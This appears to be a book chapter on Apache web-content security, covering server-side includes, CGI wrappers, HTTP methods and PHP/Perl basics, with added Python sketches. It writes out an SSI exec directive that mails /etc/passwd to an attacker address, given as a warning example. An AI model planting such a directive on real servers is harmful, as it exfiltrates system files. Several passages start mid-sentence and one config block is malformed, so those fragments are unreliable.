10.3. Web Content

After you've thoroughly configured Apache, you can finally deal with web content.

10.3.1. Static Content

Static content includes HTML, JavaScript, Flash, images, and other files that are served directly by the web server without interpretation. The files and their directories need to be readable by the user ID running Apache (apache, in our examples).

Static files don't pose much of a security threat on the server side. The web server just reads them and sends them to the requesting browser. Although there are many security issues with web browsers, client security is outside the scope of this chapter. Watch your browser vendor's web site for security news, patches, and new versions.

10.3.2. Dynamic Content: Server-Side Includes (SSI)

A step up from purely static pages, server-side includes allow inclusion of other static content, special dynamic content such as file-modification times, and even the output from the execution of external programs. Unlike CGI scripts, there is no way to pass input arguments to an SSI page.

10.3.2.1 SSI configuration

Apache needs to be told that an SSI file is not a lump of inert HTML, but should be parsed for SSI directives. First, check that includes are permitted for at least some files in this directory. Add this to httpd.conf or access.conf:

    <Location /ssi_dir>
    Options IncludesNoExec
    </Location>

One way to differentiate HTML from SSI files is to use a special suffix such as .shtml and associate it with Apache's built-in MIME type for parsable content:

    AddType text/x-server-parsed-html .shtml

or just assign the Apache handler directly:

    AddHandler server-parsed .shtml

Using this suffix tells the world that your pages use server-side includes. If you'd like to conceal this fact, use another suffix. One trick I've seen is to use .html for static text and .htm for SSI text:

    AddHandler server-parsed .htm

A little-known feature of Apache is its ability to use the execute bit of a file to indicate that it should be parsed.
I've used this to mix static and parsed HTML files in the same directory with the same suffix. The directive is as follows:

    <Location /ssi_dir>
    Options +IncludesNoExec
    XBitHack full
    </Location>

The extra attribute full tells Apache to also test the file's group-execute bit: if it is set, Apache sends a Last-Modified header taken from the file's own modification time; if it is not set, no Last-Modified date is sent. To change an HTML file into an SSI file, make it executable:

    chmod +x changeling.html

A visitor to the web site can't tell if the file is plain HTML or SSI.

10.3.2.2 Including files

The most basic use of SSI is for inclusion of static files. For example, a site can include a standard header and footer on each page:

    <!--#include virtual="header.html"-->
    . . . variable content goes here . . .
    <!--#include virtual="footer.html"-->

You can also include the output of a local CGI script by giving its relative URL:

    <!--#include virtual="/cgi-bin/script"-->

10.3.2.3 Executing commands

If Options Includes is set, you can also execute any external command on the web server, which is quite dangerous. The following is a benign example:

    <!--#exec cmd="ls -l /"-->

SSI can't get arguments from the client, so any command and arguments are fixed. Since you specify the commands, you might feel safe. However, anyone with write access to /ssi_dir could upload an HTML file containing an SSI #exec string:

    <!--#exec cmd="mail evil@weasel.org < /etc/passwd"-->

If you allow people to upload HTML (say, in a guestbook application), you should forbid SSI execution in the target directory and untaint the input (see Section 10.4.1).

Similar vulnerabilities have been seen in utilities that create HTML, such as email digesters and web-log analyzers. If you must have SSI but don't need executable external commands, always exclude them:

    <Location /ssi_dir>
    Options IncludesNoExec
    </Location>
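As an illustration of the guestbook advice above, the following is a minimal Python sketch of one way to make visitor-supplied text inert before it is written into a directory that Apache parses for SSI. It is not taken from the original text: the function name neutralize_ssi is hypothetical, and escaping every HTML metacharacter is only one possible policy. It complements, rather than replaces, Options IncludesNoExec.

```python
import html


def neutralize_ssi(user_text: str) -> str:
    """Escape HTML metacharacters so '<!--#exec ...-->' is stored as inert text."""
    # html.escape turns '<', '>', '&' and quotes into entities, so the
    # sequence '<!--#' no longer appears and cannot be read as an SSI directive.
    return html.escape(user_text, quote=True)


if __name__ == "__main__":
    # Hypothetical guestbook entry carrying the malicious directive shown above.
    entry = 'Nice site! <!--#exec cmd="mail evil@weasel.org < /etc/passwd"-->'
    print(neutralize_ssi(entry))
```

Escaping everything is the bluntest choice; a site that must accept some markup would need a real allow-list filter instead.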
10.3.3. Dynamic Content: Common Gateway Interface (CGI)

The CGI is a protocol for sending queries and data via HTTP to a program on the web server. A CGI program can be written in any language, interpreted or compiled. Surprisingly, there is still no final RFC that defines CGI. CGI 1.1 is described at http://hoohoo.ncsa.uiuc.edu/cgi/interface.html. Also, see The CGI Programming MetaFAQ (http://www.perl.org/CGI_MetaFAQ.html).

PHP, JSP, mod_perl, and other active web technologies all use the CGI standard for web client-server communication.

10.3.3.1 Standalone and built-in CGI interpreters

The CGI protocol doesn't specify how the web server should communicate with the CGI program. There have been two main solutions:

Standalone CGI programs
    Apache receives a CGI request, opens a two-way pipe to an external program, sends it the CGI input data, and returns the program's output to the client. As a separate process, the program can crash without bringing down the web server. The downside is that it's relatively slow to start a new process.

Built-in CGI programs
    The program is rewritten as an Apache module and incurs its startup cost only when an Apache process starts. This is much faster than an external program and has access to Apache's internals and other modules. The most popular modules for CGI in Apache are the interpreter engines for Perl (mod_perl) and PHP (mod_php).

Whether run in-process (built-in) or independently, CGI programs represent a large security risk. We'll cover a number of these risks, starting with the problem of securing CGI programs for different users.

Normally, CGI programs will all be run with Apache's user ID and group. If you have multiple users and virtual hosts, this lets them run each other's scripts and access each other's data. A web-hosting service might want to let its customers run their own CGI scripts but no one else's. Another site might restrict database access to certain users, requiring scripts to be run as those users.
The most common solutions are suEXEC and Cgiwrap.

10.3.3.2 suEXEC

suEXEC is a setuid root program that wraps scripts to run with a specified user ID and group ID, rather than the Apache server user and group. Scripts need to pass a number of security checks before they will be accepted. To use suEXEC, define a VirtualHost section in an Apache configuration file. For Apache 1.3, specify the desired CGI User and Group:

    <VirtualHost www.hackenbush.com>
    User hugo
    Group whyaduck
    </VirtualHost>

Specify SuexecUserGroup for Apache 2.0:

    <VirtualHost www.hackenbush.com>
    SuexecUserGroup hugo whyaduck
    </VirtualHost>

CGI scripts should be placed in directories for this virtual host that permit script execution (by default, ~/public_html/cgi-bin), and they should be owned by user hugo, group whyaduck. For details, see http://httpd.apache.org/docs/suexec.html.

10.3.3.3 Cgiwrap

Cgiwrap is also a setuid root program that wraps CGI programs, but works quite differently from suEXEC. Its installation and use are a bit complex, and are described at http://cgiwrap.sourceforge.net/.

10.3.3.4 FastCGI

suEXEC and Cgiwrap are used with external CGI programs. FastCGI is an alternative for creating CGI programs without the startup time of a standalone program, but also without the complexity of an Apache module. The protocol is language-independent, and libraries are available for the most common web languages. Details are available at http://www.fastcgi.com.

FastCGI falls somewhere between standalone and module-based CGI. It starts an external CGI program but maintains a persistent connection through the Apache module mod_fastcgi.

Scripts need slight modification to work with FastCGI. You must have set Options ExecCGI in httpd.conf to enable a FastCGI application, just as you would any other CGI program. If you want to allow use of suEXEC with FastCGI, set FastCGIWrapper On. FastCGI scripts are vulnerable to the same problems as any CGI scripts.
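To give a feel for the kind of checks a wrapper such as suEXEC applies before it agrees to run a script, here is a rough Python sketch that tests a few of the documented conditions: ownership by the target user and group, no write permission for group or others, and no setuid or setgid bits. It is only an approximation for auditing your own script directories. The function name looks_safe_for_suexec is hypothetical, and the real suEXEC performs many more checks than are shown here.

```python
import os
import stat


def looks_safe_for_suexec(path: str, expected_uid: int, expected_gid: int) -> bool:
    """Approximate a few suEXEC-style checks on a CGI script (illustrative only)."""
    st = os.stat(path)
    mode = st.st_mode
    # Only plain files are acceptable as scripts.
    if not stat.S_ISREG(mode):
        return False
    # The script must belong to the user and group it will run as.
    if st.st_uid != expected_uid or st.st_gid != expected_gid:
        return False
    # It must not be writable by group or others.
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        return False
    # It must not carry setuid or setgid bits.
    if mode & (stat.S_ISUID | stat.S_ISGID):
        return False
    return True
```

A script owned by hugo:whyaduck with mode 755 would pass these particular tests; the same script with mode 775 would not.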
10.3.3.5 Specifying CGI programs

There are a couple of ways to tell Apache to treat a file as a CGI script rather than a static file.

Treat every file within a directory as a CGI script:

    ScriptAlias /cgi-bin /usr/local/apache/cgi-bin
    Options ExecCGI
    </Directory>

Mixing static files and scripts is dangerous, since a configuration typo could cause Apache to treat a script file as a normal file and allow users to view its contents. This could reveal passwords or other sensitive information. If you do mix files and scripts, you need to tell Apache which files are CGI scripts and which are static files. Use a file suffix or some other naming convention to mark the script. We'll see how to protect files shortly.
them as CGI scripts. Consider using suEXEC (described earlier in this chapter) or limiting CGI scripts to directories where you can see them.

10.3.3.6 HTTP, URLs, and CGI

Just as a little SMTP knowledge aids understanding of email-security issues, a little background on HTTP and URLs improves knowledge of web security.

Every exchange between a web client and server is defined by the Hypertext Transfer Protocol (HTTP). HTTP 1.0 was the first widely used version, but it had some shortcomings. Most of these were addressed with HTTP 1.1, the current version that is almost universal. HTTP 1.1 is defined in RFC 2616 (http://www.w3.org/Protocols/rfc2616/rfc2616.html). The web client makes HTTP requests, and the web server responds. Web browsers hide much of the data exchange, such as MIME types, cache settings, content negotiation, timestamps, and other details. Other clients (such as a web spider, wget, or curl) offer much more control over the exchange.

An HTTP request contains an initial request line:

    Method URI HTTP-Version

Methods include OPTIONS, GET, HEAD, POST, PUT, TRACE, DELETE, and CONNECT. Some methods have a corresponding URL format.

This line may be followed by request header lines containing information about the client, the host, authorization, and other things. These lines are followed by a blank line, then the message body. The web server returns a header and an optional body, depending on the request.

The URL types you use have security implications. Since the protocol is text, it's easy to forge headers and bodies (although attackers have also successfully forged binary data for years). You can't trust what you're being told, whether you're a web server or a client. See section 15 of RFC 2616 for other warnings.

The following are the most common methods and some security implications.

10.2.2.2.8 HEAD method

Do you want to know what web server someone is running? It's easy.
Let's look at the HEAD data for the home page at http://www.apache.org:

    $ telnet www.apache.org 80
    Trying 63.251.56.142...
    Connected to daedalus.apache.org (63.251.56.142).
    Escape character is '^]'.
    HEAD / HTTP/1.1
    Host: www.apache.org

    HTTP/1.1 200 OK
    Date: Sat, 13 Apr 2002 03:48:58 GMT
    Server: Apache/2.0.35 (Unix)
    Cache-Control: max-age=86400
    Expires: Sun, 14 Apr 2002 03:48:58 GMT
    Accept-Ranges: bytes
    Content-Length: 7790
    Content-Type: text/html

    Connection closed by foreign host.
    $

(A handy alternative to this manual approach is the curl client, available from http://www.haxx.se.) The actual responses vary by web server and site. Some don't return a Server: response header, or say they're something else, to protect against attacks aided by port 80 fingerprinting. The default value returned by Apache includes the identity of many modules. To return only a Server: Apache response, specify:

    ServerTokens ProductOnly

10.2.2.2.9 OPTIONS method

If OPTIONS is supported, it tells us more about the web server:

    $ telnet www.apache.org 80
    Trying 63.251.56.142...
    Connected to daedalus.apache.org (63.251.56.142).
    Escape character is '^]'.
    OPTIONS * HTTP/1.1
    Host: www.apache.org

    HTTP/1.1 200 OK
    Date: Sat, 13 Apr 2002 03:57:10 GMT
    Server: Apache/2.0.35 (Unix)
    Cache-Control: max-age=86400
    Expires: Sun, 14 Apr 2002 03:57:10 GMT
    Allow: GET,HEAD,POST,OPTIONS,TRACE
    Content-Length: 0
    Content-Type: text/plain

    Connection closed by foreign host.
    $

The OPTIONS method is not a security concern, but you might like to try it on your own servers to see what it returns.

10.2.2.2.10 GET method

GET is the standard method for retrieving data from a web server. A URL for the GET method may be simple, like this call for a home page:

    http://www.hackenbush.com/

A GET URL may be extended with a ? and name=value arguments.
Each instance of name and value is URL encoded, and pairs are separated by an &:

    http://www.hackenbush.com/cgi-bin/groucho.pl?day=jan%2006&user=zeppo

An HTTP GET request contains a header but no body. Apache handles the request directly, assigning everything after the ? to the QUERY_STRING environment variable. Since all the information is in the URL itself, a GET URL can be bookmarked or repeated from the browser, without resubmitting a form. It can also be generated easily by client-side or server-side scripting languages.

Although you may see some very long and complex GET URLs, web servers may have size limits that silently snip your URL. Apache guards against GET buffer overflow attacks, but some other web servers and web cache servers may not.

Since all the parameters are in the URL, they also appear in the web-server logs. If there is any sensitive data in the form, a POST request should be used.

The ? and /cgi-bin advertise that this URL calls a CGI script called groucho.pl. You may want the benefits of a GET URL without letting everyone know that this is a CGI script. If an attacker knows you're using Perl scripts on Apache, for instance, he can target his attack more effectively. Another reason to hide the invocation of a script involves making the URL more search-engine friendly. Many web search engines skip URLs that look like CGI scripts. One technique uses the PATH_INFO environment variable and Apache rewriting rules. You can define a CGI directory with a name that looks like a regular directory:

    ScriptAlias /fakedir/ "/usr/local/apache/real_cgi_bin/"

Within this directory, you could have a CGI script called whyaduck. When this URL is received:

    http://www.hackenbush.com/fakedir/whyaduck/day/jan%2006/user/zeppo

Apache will execute the CGI script /usr/local/apache/real_cgi_bin/whyaduck and pass it the environment variable PATH_INFO with the value /day/jan 06/user/zeppo.
Your script can parse the components with any method you like (use split in Perl or explode in PHP to split on the slashes).

Since GET parameters are part of the URL, they may be immortalized in server logs, bookmarks, and referrals. This may expose confidential information. If this is an issue, use POST rather than GET. If you don't specify the method attribute for a <form> tag in HTML, it uses GET.

10.2.2.2.11 POST method

POST is used to send data to a CGI program on the web server. A URL for the POST method appears bare, with no ? or encoded arguments. Data are sent in the HTTP body to Apache, then from Apache to the standard input of the CGI program.

A user must resubmit her original form and data to refresh the output page, because the recipient has no way of knowing if the data may have changed. (With a GET URL, everything's in the URL.) The POST data size is not as limited as with GET. Normally POST data is not logged, although you can configure Apache to do so. A POST URL cannot be bookmarked, and it cannot be automatically submitted from a browser without using client-side JavaScript (other clients such as wget and curl can submit POST requests). You need to have a button or other link with a JavaScript URL that submits a form that is somewhere on your page.

10.2.2.2.12 PUT method

This was the original HTTP upload mechanism. Specify a CGI script to handle a PUT request, as you would for a POST request. PUT seems to have been superseded by WebDAV and other methods, which are described in Section 10.4.4.

10.2.2.2.13 TRACE method

The TRACE method was intended as a debugging tool, but almost no one has heard of it or used it. It was a matter of time until someone found an exploit (http://www.kb.cert.org/vuls/id/867593) and recommended disabling TRACE processing in Apache. The environment required for the exploit to work is so specific that this doesn't appear to be necessary.
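To make the two GET styles discussed earlier in this section concrete, the following Python sketch decodes the same parameters from a QUERY_STRING and from a PATH_INFO value. The original text mentions only Perl's split and PHP's explode; Python is used here purely for illustration, and both function names are hypothetical. The sketch assumes PATH_INFO has already been URL-decoded by the server, as in the /day/jan 06/user/zeppo example.

```python
from urllib.parse import parse_qs


def params_from_query(query_string: str) -> dict:
    """Decode a QUERY_STRING such as 'day=jan%2006&user=zeppo'."""
    # parse_qs URL-decodes names and values and returns a list per name;
    # this sketch keeps only the first value for each name.
    return {name: values[0] for name, values in parse_qs(query_string).items()}


def params_from_path_info(path_info: str) -> dict:
    """Turn '/day/jan 06/user/zeppo' into name/value pairs."""
    parts = [p for p in path_info.strip("/").split("/") if p]
    # Components alternate name, value, name, value; a trailing
    # unpaired name is silently dropped by zip.
    return dict(zip(parts[0::2], parts[1::2]))


if __name__ == "__main__":
    print(params_from_query("day=jan%2006&user=zeppo"))
    print(params_from_path_info("/day/jan 06/user/zeppo"))
```

Either way, the decoded values come from the client and deserve the same suspicion as any other request data.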
10.3.3.7 CGI languages

Any language can be a CGI language just by following the CGI specification. An HTTP response requires at least an initial MIME type line, a blank line, and then content. Here's a minimal CGI script written in the shell:

    #!/bin/sh
    echo "Content-type: text/html"
    echo
    echo "Hello, world"

Technically, we should terminate each of the first two echo lines with a carriage return-line feed pair ('\r\n'), but browsers know what to do with bare Unix-style line feeds.

Although a C program might run faster than a shell or Perl equivalent, CGI startup time tends to outweigh that advantage. I feel that the best balance of flexibility, performance, and programmer productivity lies with interpreted languages running as Apache modules. The top languages in that niche are PHP and Perl.

In the following section on web applications, I'll discuss the security trouble spots to watch, with examples from Perl and PHP. But first, a few words about the PHP and Perl languages may be helpful.

10.2.2.2.14 PHP

PHP is a popular web-scripting language for Unix and Windows. It's roughly similar to, and competes with, Visual Basic and ASP on Windows. On Unix and Linux, it competes with Perl and Java. Its syntax is simpler than Perl's, and its interpreter is small and fast.
and end tags:

    <?php ... ?>
    <? ... ?>
    <% ... %>

PHP files can contain any mixture of normal HTML and PHP, like this (echo prints its arguments):

    <? echo "<b>string</b> = <I>$string</I>\n"; ?>

or more compactly mixing HTML and PHP (=$string is PHP shorthand for echo $string):

    <b>string</b> = <i><?=$string?></i>

PHP configuration options can be specified in three ways:

The php.ini file, normally in the /usr/local/lib directory. Here's an example that disables PHP error displays:

    display_errors = off

The Apache configuration files, in the styles shown in Table 10-6.
error display:

    php_admin_flag display_errors off

These can be placed within container directives to customize PHP settings for different directories or virtual hosts. php_value and php_flag may also be used in .htaccess files.

Some directives (see http://www.php.net/manual/en/function.ini-set) can be set in the PHP script at runtime:

    ini_set("display_errors", "0");

10.2.2.2.15 Perl

Perl is the mother of all web-scripting languages. The most popular module for CGI processing, CGI.pm, is part of the standard Perl release.

Here's a quick Perl script to get the value of a form variable (or handcrafted GET URL) called string:

    #!/usr/bin/perl -w
    use strict;
    use CGI qw(:standard);
    my $string = param("string");
    print header;
    print "<b>string</b> = <I>$string</I>\n";

A Perl CGI script normally contains a mixture of HTML print statements and Perl processing statements.
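For comparison with the shell, PHP, and Perl snippets above, here is a hedged Python sketch of the same tiny CGI program: it reads the form variable string from QUERY_STRING and emits a MIME type line, a blank line, and the content, using the CRLF line endings mentioned earlier. The function name render is hypothetical, and the call to html.escape is an addition that the scripts above do not make.

```python
import html
import os
import sys
from urllib.parse import parse_qs


def render(query_string: str) -> str:
    """Build a complete CGI response for the form variable 'string'."""
    # Missing variable falls back to an empty string.
    value = parse_qs(query_string).get("string", [""])[0]
    # Escaping the value is an extra precaution not present in the
    # PHP and Perl snippets; it keeps submitted markup from being rendered.
    body = "<b>string</b> = <i>{}</i>\n".format(html.escape(value))
    # Header line and blank line, each terminated with CRLF, then content.
    return "Content-Type: text/html\r\n\r\n" + body


if __name__ == "__main__":
    # Under CGI, the web server supplies QUERY_STRING in the environment.
    sys.stdout.write(render(os.environ.get("QUERY_STRING", "")))
```

Keeping the response construction in a function separate from the environment lookup makes the script easy to exercise from the command line before it is placed in a CGI directory.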